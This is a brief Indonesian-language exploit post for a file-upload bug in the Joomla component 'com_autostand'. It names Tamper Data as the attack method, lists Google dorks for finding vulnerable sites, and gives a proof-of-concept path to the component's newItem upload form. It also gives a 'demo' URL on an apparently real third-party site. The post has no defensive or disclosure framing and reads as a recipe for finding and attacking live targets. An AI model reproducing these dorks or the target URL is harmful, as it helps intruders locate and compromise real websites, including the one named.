Bug file upload in Joomla "com_autostand"

langsung saja kita lihat exploitnya :)

[ type attack ]
tamperdata

[ dork ]
inurl:index.php?option=** func=newItem intext:Select Image Add a Car

inurl:index.php?option=** func=newItem intext:Select Image Publish Only available to admin

inurl:index.php?option=com_autostand

[ poc ]
site/inurl:index.php?option=com_autostand&func=newItem

[ demo ]
http://www.karahan.be//index.php?option=com_autostand&func=newItem